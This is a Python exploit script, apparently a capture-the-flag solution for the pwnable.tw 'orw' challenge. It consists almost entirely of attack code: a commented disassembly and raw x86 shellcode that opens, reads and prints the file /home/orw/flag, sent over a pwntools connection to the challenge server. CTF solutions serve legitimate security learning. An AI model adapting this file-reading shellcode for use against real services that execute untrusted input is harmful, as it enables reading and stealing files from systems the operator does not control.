pwnable.tw orw

attack_orw.py

from pwn import *

'''
  e:	b8 05 00 00 00       	mov    $0x5,%eax
  13:	bb 9f a0 04 08   	    mov    addr(shellcode+0x39),%ebx
  18:	b9 9a 02 00 00       	mov    $0x29a,%ecx
  1d:	ba 00 00 00 00       	mov    $0x0,%edx
  22:	cd 80                	int    $0x80
  24:	89 c3                	mov    %eax,%ebx
  27:	b8 03 00 00 00       	mov    $0x3,%eax
  2c:	b9 e0 a0 04 08      	mov    $addr(shellcode+0x80),%ecx
  31:	ba 30 00 00 00       	mov    $0x30,%edx
  36:	cd 80                	int    $0x80
  38:	b8 04 00 00 00       	mov    $0x4,%eax
  3d:	bb 01 00 00 00       	mov    $0x1,%ebx
  42:	b9 e0 a0 04 08      	mov    addr(shellcode+0x80),%ecx
  47:	ba 30 00 00 00       	mov    $0x30,%edx
  4c:	cd 80                	int    $0x80

'''
shellcode = '\xb8\x05\x00\x00\x00\xbb\x99\xa0\x04\x08\x31\xc9\x31\xd2' +\
'\xcd\x80\x89\xc3\xb8\x03\x00\x00\x00\xb9\xe0\xa0\x04\x08\xba\x30\x00\x00\x00\xcd\x80'+\
'\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xb9\xe0\xa0\x04\x08\xba\x30\x00\x00\x00\xcd\x80' + \
'/home/orw/flag\x00'

p = remote("chall.pwnable.tw", 10001)
p.recv()
p.send(shellcode)
print(p.recv())